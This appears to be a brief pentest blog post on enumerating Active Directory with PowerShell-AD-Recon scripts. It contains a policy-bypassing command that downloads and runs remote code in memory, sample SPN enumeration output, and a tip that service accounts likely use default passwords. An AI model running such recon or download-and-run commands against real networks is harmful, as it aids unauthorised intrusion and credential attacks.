https://github.com/PyroTek3/PowerShell-AD-Recon
C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"
Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET
Domain : UNLUCKY.NET
ServerName : unlucklaptop.unlucky.net
Port :
Instance : SQLEXPRESS
ServiceAccountDN :
OperatingSystem : {Windows 8.1 Enterprise}
OSServicePack :
LastBootup : 1/10/2015 11:47:55 AM
OSVersion : {6.3 (9600)}
Description :
Domain : UNLUCKY.NET
ServerName : unluckserver.unlucky.net
Port : 1433
Instance :
ServiceAccountDN : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem :
OSServicePack :
LastBootup : 12/31/1600 4:00:00 PM
OSVersion :
Description :
SrvAcctUserID : svc-userid
SrvAcctDescription : ---SNIP--- The rest of the repo has fun stuff too
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Find Exchange Servers
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Get a list of all the service accounts. Those are always good candidates for company defaults
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-searches for a list of attributes across the forest. This will take a LONG time on a big domain/forest.
default list of stuff:
[String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP","ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV","Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),
No comments:
Post a Comment